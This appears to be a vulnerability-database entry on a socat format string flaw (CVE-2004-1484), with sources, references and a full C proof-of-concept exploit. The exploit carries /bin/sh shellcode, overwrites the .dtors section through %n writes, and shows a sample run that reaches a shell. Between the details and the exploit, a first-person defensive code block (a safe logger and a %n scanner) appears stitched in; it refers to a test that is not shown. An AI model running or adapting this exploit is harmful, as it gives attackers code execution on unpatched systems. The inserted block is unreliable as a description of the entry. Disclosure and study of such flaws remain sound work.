Socat Remote Format String Vulnerability

Vulnerability ID 1108243 Vulnerability type Format string
Published 2004-10-23 Updated 2005-10-20
CVE ID CVE-2004-1484
CNNVD ID CNNVD-200412-449
Platform Linux CVSS score 5.0
|Sources
https://www.exploit-db.com/exploits/591
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200412-449
|Details
The _msg function in error.c of socat 1.4.0.3 and earlier contains a format string vulnerability when socat is used as an HTTP proxy client and run with the -ly option. A remote attacker or local user can execute arbitrary code via format string specifiers in a system log message.
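The bug class described above, as an added example (my code, not socat's and not the exploit on this page): the vulnerable idiom appears only in a comment, log_msg_safe() is the corrected idiom (the message passed as data under a fixed format), and count_write_directives() is a small scanner that flags %n conversions, positional forms such as "%30$n" included, in text headed for a log call. Function names and the sample strings are my own assumptions.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/* Vulnerable idiom behind this bug class (for contrast only; never call it
 * with attacker-influenced text):   syslog(LOG_ERR, msg);  fprintf(stderr, msg);
 * msg becomes the format, so a "%30$n" inside it turns into a memory write
 * through whatever the 30th argument slot holds.
 * Corrected idiom: the message is data under a fixed, literal format. */
int log_msg_safe(char *out, size_t outlen, const char *msg) {
    return snprintf(out, outlen, "E %s", msg);
}

/* 1 if msg survives the safe logger byte for byte, 0 otherwise. */
int logged_verbatim(const char *msg) {
    char out[256];
    if (log_msg_safe(out, sizeof out, msg) < 0) return 0;
    return strcmp(out + 2, msg) == 0;
}

/* Walk s the way printf would: returns the number of conversion directives
 * and stores in *writes how many of them are %n.  Understands "%%",
 * positional "N$", flags, width, precision and length modifiers.  Usable as
 * a log-scanner or input-filter rule: text carrying %n must never reach a
 * format argument. */
static int scan_format(const char *s, int *writes) {
    int total = 0;
    *writes = 0;
    for (const char *p = s; *p; p++) {
        if (*p != '%') continue;
        p++;
        if (*p == '%') continue;                          /* literal "%%" */
        const char *q = p;
        while (isdigit((unsigned char)*q)) q++;
        if (*q == '$') q++; else q = p;                   /* positional "30$" */
        while (*q && strchr("-+ #0", *q)) q++;            /* flags */
        while (isdigit((unsigned char)*q) || *q == '*') q++;          /* width */
        if (*q == '.') { q++; while (isdigit((unsigned char)*q) || *q == '*') q++; }
        while (*q && strchr("hlLqjzt", *q)) q++;          /* length modifiers */
        if (!*q) break;                                   /* truncated directive */
        total++;
        if (*q == 'n') (*writes)++;
        p = q;
    }
    return total;
}

int count_directives(const char *s) { int w; return scan_format(s, &w); }
int count_write_directives(const char *s) { int w; scan_format(s, &w); return w; }
```

The first two sample strings in the test are the payload and the message visible in the transcript further down this page.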
|Exploit
/* socat_exp.c

   Socat Format String Vulnerability

   socat <= 1.4.0.2 local exploit (Proof of Concept)

   Tested in Slackware 9.0 / 9.1 / 10.0

   by CoKi <[email protected]>
   No System Group - http://www.nosystem.com.ar
   
coki@servidor:~$ make socat_exp
coki@servidor:~$ ./socat_exp

 socat <= 1.4.0.2 local exploit (Proof of Concept)
 by CoKi <[email protected]>

 shellcode address = 0xbfffffb9
 .dtors address    = 0x080740c4

2004/10/19 09:49:46 socat[26197] E unknown syslog facility
"ÄÅÆÇ%142u%30$n%70u%31$n%256u%32$n%192u%33$n"
sh-2.05b$

This exploit does not give a root shell :(   
*/

#include <stdio.h>
#include <stdlib.h>     /* exit, atoi */
#include <string.h>
#include <strings.h>    /* bzero */
#include <unistd.h>     /* execle */

#define PATH "/usr/local/bin/socat"
#define OBJDUMP "/usr/bin/objdump"
#define GREP "/usr/bin/grep"

unsigned char shellcode[]=  /* aleph1 shellcode.45b */
        "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c"
        "\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb"
        "\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff\x2f\x62\x69\x6e"
        "\x2f\x73\x68";

int check(unsigned long addr);

int main(int argc, char *argv[]) {

        int i, dtorsaddr;
        unsigned int bal1, bal2, bal3, bal4;
        char temp[512];
        char buffer[1024];
        int cn1, cn2, cn3, cn4;
        FILE *f;
        /* the shellcode is the only environment string, so it lands near
           the top of the stack at a predictable address */
        char *env[] = {(char *)shellcode, NULL};
        int shaddr = 0xbffffffa - strlen((char *)shellcode) - strlen(PATH);

        /* read the .dtors section of the socat binary; the word after the
           0xffffffff header is the entry overwritten with shaddr */
        sprintf(temp, "%s -s -j .dtors %s | %s ffffffff", OBJDUMP, PATH, GREP);
        f = popen(temp, "r");
        if(f == NULL || fscanf(f, " %08x", &dtorsaddr) != 1) {
                if(f) pclose(f);
                printf("Cannot find .dtors address\n");
                exit(1);
        }
        pclose(f);
        dtorsaddr = dtorsaddr + 4;

        printf("\n socat <= 1.4.0.2 local exploit (Proof of Concept)\n");
        printf(" by CoKi <[email protected]>\n\n");
        printf(" shellcode address = 0x%08x\n", shaddr);
        printf(" .dtors address    = 0x%08x\n\n", dtorsaddr);

        bzero(temp, sizeof(temp));
        bzero(buffer, sizeof(buffer));

        /* everything after -ly is rejected as an unknown syslog facility
           and echoed through the vulnerable _msg() path (see the transcript
           in the header comment) */
        strcat(buffer, "-ly");

        /* four consecutive target addresses, one per byte written by %n */
        for(i = 0; i < 4; i++) {
                bzero(temp, sizeof(temp));
                sprintf(temp, "%s", (char *)&dtorsaddr);
                strncat(buffer, temp, 4);
                dtorsaddr++;
        }

        /* split shaddr into bytes and derive the padding width that makes
           each successive %n write the next byte value */
        bal1 = (shaddr & 0xff000000) >> 24;
        bal2 = (shaddr & 0x00ff0000) >> 16;
        bal3 = (shaddr & 0x0000ff00) >>  8;
        bal4 = (shaddr & 0x000000ff);

        cn1 = bal4 - 27 - 16;
        cn1 = check(cn1);
        cn2 = bal3 - bal4;
        cn2 = check(cn2);
        cn3 = bal2 - bal3;
        cn3 = check(cn3);
        cn4 = bal1 - bal2;
        cn4 = check(cn4);

        sprintf(temp, "%%%du%%30$n%%%du%%31$n%%%du%%32$n%%%du%%33$n", cn1, cn2, cn3, cn4);

        strcat(buffer, temp);

        execle(PATH, "socat", buffer, NULL, env);
        perror("execle");       /* only reached if socat could not be started */
        return 1;
}

/* a negative or zero width would break the padding; wrap it into the
   next 256-byte window instead */
int check(unsigned long addr) {
        char tmp[128];
        snprintf(tmp, sizeof(tmp), "%d", (int)addr);
        if(atoi(tmp) < 1)
                addr = addr + 256;

        return addr;
}

// milw0rm.com [2004-10-23]
|References

Source: XF
Name: socat-format-string(17822)
Link: http://xforce.iss.net/xforce/xfdb/17822
Source: BID
Name: 11505
Link: http://www.securityfocus.com/bid/11505
Source: www.nosystem.com.ar
Link: http://www.nosystem.com.ar/advisories/advisory-07.txt
Source: GENTOO
Name: GLSA-200410-26
Link: http://www.gentoo.org/security/en/glsa/glsa-200410-26.xml
Source: SECUNIA
Name: 12936
Link: http://secunia.com/advisories/12936/
Source: www.dest-unreach.org
Link: http://www.dest-unreach.org/socat/advisory/socat-adv-1.html
